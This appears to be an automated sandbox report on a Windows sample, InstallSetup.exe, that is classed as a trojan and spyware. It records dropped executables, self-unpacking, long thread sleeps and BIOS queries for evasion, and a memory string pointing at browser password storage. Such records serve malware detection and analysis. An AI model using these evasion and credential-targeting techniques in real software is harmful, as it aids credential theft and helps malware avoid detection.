Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C7B4.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/7@2/3

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_00C016B6 CreateToolhelp32Snapshot,Module32First,

0_2_00C016B6

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Code function: 3_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_00437DF0

Source: C:\Users\user\Desktop\InstallSetup.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3032

Source: C:\Users\user\Desktop\InstallSetup.exe

File created: C:\Users\user\AppData\Local\Temp\C7B4.tmp

Jump to behavior

Source: InstallSetup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\InstallSetup.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C7B4.tmp.exe, 00000003.00000003.1617953055.000000000310A000.00000004.00000800.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000003.1617391371.0000000003126000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: InstallSetup.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\InstallSetup.exe "C:\Users\user\Desktop\InstallSetup.exe"
Source: C:\Users\user\Desktop\InstallSetup.exe	Process created: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe "C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1952
Source: C:\Users\user\Desktop\InstallSetup.exe	Process created: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe "C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Unpacked PE file: 3.2.C7B4.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\InstallSetup.exe	Unpacked PE file: 0.2.InstallSetup.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Unpacked PE file: 3.2.C7B4.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0097799F push esp; retf	0_2_009779A7
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_009509CD push ecx; ret	0_2_009509E0
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0097DDDE push dword ptr [esp+ecx-75h]; iretd	0_2_0097DDE2
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00979DE8 pushad ; retf	0_2_00979DEF
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0095CE18 push ss; retf	0_2_0095CE1D
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00977F9D push esp; retf	0_2_00977F9E
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0094FFF3 push ecx; ret	0_2_00950006
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00C042AD push 00000003h; ret	0_2_00C042B1
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00C02502 push es; iretd	0_2_00C02513
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00C03E0C pushad ; ret	0_2_00C03E34
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh	3_2_0043D812
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00443469 push ebp; iretd	3_2_0044346C
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0044366E push 9F00CD97h; ret	3_2_004436B1
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h	3_2_0043AE3E
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_004477A5 push ebp; iretd	3_2_004477AA
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009AB097 push eax; mov dword ptr [esp], 1D1E1F10h	3_2_009AB0A5
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00993A79 push esp; iretd	3_2_00993A7C
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_009ADA77 push eax; mov dword ptr [esp], 707F7E0Dh	3_2_009ADA79
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00A56835 push ss; retf	3_2_00A56823
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00A524F3 push 00000039h; ret	3_2_00A5253B
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00A524CD push 00000039h; ret	3_2_00A5253B
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00A54408 push ebp; ret	3_2_00A5440B
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00A52464 push 00000039h; ret	3_2_00A5253B
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00A567B2 push ss; retf	3_2_00A56823

Source: InstallSetup.exe	Static PE information: section name: .text entropy: 7.547124008280789
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.372861140072552
Source: C7B4.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.372861140072552

Source: C:\Users\user\Desktop\InstallSetup.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe			Jump to dropped file
Source: C:\Users\user\Desktop\InstallSetup.exe	File created: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe			Jump to dropped file

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\InstallSetup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe	Window / User API: threadDelayed 427			Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	Window / User API: threadDelayed 9558			Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-65674

Source: C:\Users\user\Desktop\InstallSetup.exe

API coverage: 5.6 %

Source: C:\Users\user\Desktop\InstallSetup.exe TID: 2952	Thread sleep count: 427 > 30	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe TID: 2952	Thread sleep time: -308294s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe TID: 2952	Thread sleep count: 9558 > 30	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe TID: 2952	Thread sleep time: -6900876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe TID: 4216	Thread sleep time: -150000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\InstallSetup.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\InstallSetup.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_004389F2 FindFirstFileExW,		0_2_004389F2
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00978C59 FindFirstFileExW,		0_2_00978C59

Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\	Jump to behavior
